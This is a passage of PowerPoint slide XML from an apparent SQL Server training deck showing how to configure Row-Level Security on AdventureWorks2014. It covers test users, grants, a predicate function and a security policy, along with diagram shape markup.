                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>block</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> predicate prevents unauthorized action and throws an exception if the action can’t be performed.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI Semilight"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129624258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Configuring Row-Level Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="1344395"/>
            <a:ext cx="250078" cy="9730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14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="582626" y="1344395"/>
            <a:ext cx="8174455" cy="4912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64592" marR="0" lvl="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create user accounts to test Row-Level Security.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="2387834"/>
            <a:ext cx="250078" cy="6887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17" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="692150" y="2710849"/>
            <a:ext cx="11057778" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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GRANT SELECT ON Sales.SalesOrderHeader TO Manager;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GRANT SELECT ON Sales.SalesOrderHeader TO SalesPerson280;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="568457" y="2390433"/>
            <a:ext cx="10515600" cy="274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64592" marR="0" lvl="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Grant read access to users on required table.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="692150" y="3463098"/>
            <a:ext cx="11057778" cy="1188720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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CREATE SCHEMA Security;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GO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CREATE FUNCTION Security.fn_securitypredicate(@SalesPersonID AS int)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    RETURNS TABLE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WITH SCHEMABINDING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AS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   RETURN SELECT 1 AS fn_securitypredicate_result WHERE ('SalesPerson' + CAST(@SalesPersonId as VARCHAR(16)) = USER_NAME())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    OR (USER_NAME() = 'Manager');</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="3142262"/>
            <a:ext cx="250078" cy="150955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22" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="561366" y="3142682"/>
            <a:ext cx="10515600" cy="274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64592" marR="0" lvl="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a new schema and inline table-valued function.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="692150" y="1677330"/>
            <a:ext cx="11057778" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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USE AdventureWorks2014;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GO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CREATE USER Manager WITHOUT LOGIN;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CREATE USER SalesPerson280 WITHOUT LOGIN;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="692150" y="5038307"/>
            <a:ext cx="11057778" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="109728" tIns="0" rIns="91440" bIns="0" numCol="1" anchor="ctr" anchorCtr="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CREATE SECURITY POLICY SalesFilter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ADD FILTER PREDICATE Security.fn_securitypredicate(SalesPersonID)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  ON Sales.SalesOrderHeader,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ADD BLOCK PREDICATE Security.fn_securitypredicate(SalesPersonID)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  ON Sales.SalesOrderHeader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WITH (STATE = ON);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="4717471"/>
            <a:ext cx="250078" cy="12352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29" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="540102" y="4717891"/>
            <a:ext cx="10515600" cy="274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82880" marR="0" lvl="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Create a security policy adding the function as both a filter and a block predicate on the table.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="442072" y="6018360"/>
            <a:ext cx="250078" cy="3200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32" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="540101" y="6018361"/>
            <a:ext cx="11589773" cy="32083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82880" marR="0" lvl="0" algn="l" defTabSz="913505" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-50" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Execute the query to the table as each test user to check the result. (You can also alter the security policy to disable policy.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419414617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75278" y="4741884"/>
            <a:ext cx="8213840" cy="1772250"/>
            <a:chOff x="5241054" y="5022998"/>
            <a:chExt cx="6950515" cy="1499670"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="492" name="Group 491"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5241054" y="5022998"/>
              <a:ext cx="3720175" cy="1499670"/>
              <a:chOff x="4092791" y="3635676"/>
              <a:chExt cx="8355063" cy="3368075"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="586" name="Group 585"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4092791" y="3635676"/>
                <a:ext cx="8355063" cy="3368075"/>
                <a:chOff x="3324709" y="3101831"/>
                <a:chExt cx="8935445" cy="3602037"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="592" name="Rectangle 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="11435400" y="5682395"/>
                  <a:ext cx="475302" cy="951827"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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93" name="AutoShape 4"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3324709" y="3101831"/>
                  <a:ext cx="893544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94" name="Rectangle 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6464883" y="5419696"/>
                  <a:ext cx="245593" cy="1214527"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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95" name="Rectangle 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6312151" y="4896741"/>
                  <a:ext cx="245593" cy="1737482"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="0072C6">
                    <a:lumMod val="7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96" name="Rectangle 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6996391" y="5682395"/>
                  <a:ext cx="475302" cy="951828"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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97" name="Rectangle 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7189445" y="5235195"/>
                  <a:ext cx="476525" cy="1399028"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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98" name="Rectangle 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10228205" y="5419696"/>
                  <a:ext cx="245593" cy="1214527"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="969696"/>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99" name="Rectangle 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10075472" y="4896741"/>
                  <a:ext cx="245593" cy="1737482"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="969696"/>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0" name="Rectangle 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10759713" y="5682395"/>
                  <a:ext cx="475302" cy="951828"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:lumMod val="8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1" name="Rectangle 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10952766" y="5235195"/>
                  <a:ext cx="476525" cy="1399028"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="969696"/>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2" name="Rectangle 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9408338" y="5044585"/>
                  <a:ext cx="779545" cy="165683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3" name="Rectangle 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9835988" y="6504706"/>
                  <a:ext cx="103858" cy="19672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4" name="Rectangle 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9660041" y="6504706"/>
                  <a:ext cx="103858" cy="19672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5" name="Rectangle 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5818021"/>
                  <a:ext cx="626813" cy="100192"/>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6" name="Rectangle 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5993969"/>
                  <a:ext cx="626813"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7" name="Rectangle 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="6167473"/>
                  <a:ext cx="626813" cy="100192"/>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8" name="Rectangle 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="6343420"/>
                  <a:ext cx="626813" cy="100192"/>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09" name="Rectangle 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5468570"/>
                  <a:ext cx="626813"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0" name="Rectangle 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5644518"/>
                  <a:ext cx="626813" cy="9774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1" name="Rectangle 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5119119"/>
                  <a:ext cx="626813"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2" name="Rectangle 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9486537" y="5295066"/>
                  <a:ext cx="626813"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3" name="Rectangle 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4767723" y="5044585"/>
                  <a:ext cx="779544" cy="1656840"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="00BC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4" name="Rectangle 27"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5195373" y="6504706"/>
                  <a:ext cx="103858" cy="19672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5" name="Rectangle 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5019425" y="6504706"/>
                  <a:ext cx="103858" cy="19672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6" name="Rectangle 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5818021"/>
                  <a:ext cx="625591" cy="100192"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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7" name="Rectangle 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5993969"/>
                  <a:ext cx="625591" cy="101415"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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8" name="Rectangle 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="6167473"/>
                  <a:ext cx="625591" cy="100192"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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19" name="Rectangle 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="6343420"/>
                  <a:ext cx="625591" cy="100192"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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0" name="Rectangle 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5468570"/>
                  <a:ext cx="625591" cy="101415"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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1" name="Rectangle 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5644518"/>
                  <a:ext cx="625591" cy="97749"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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2" name="Rectangle 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5119119"/>
                  <a:ext cx="625591" cy="101415"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="008A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3" name="Rectangle 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4845921" y="5295066"/>
                  <a:ext cx="625591" cy="101415"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
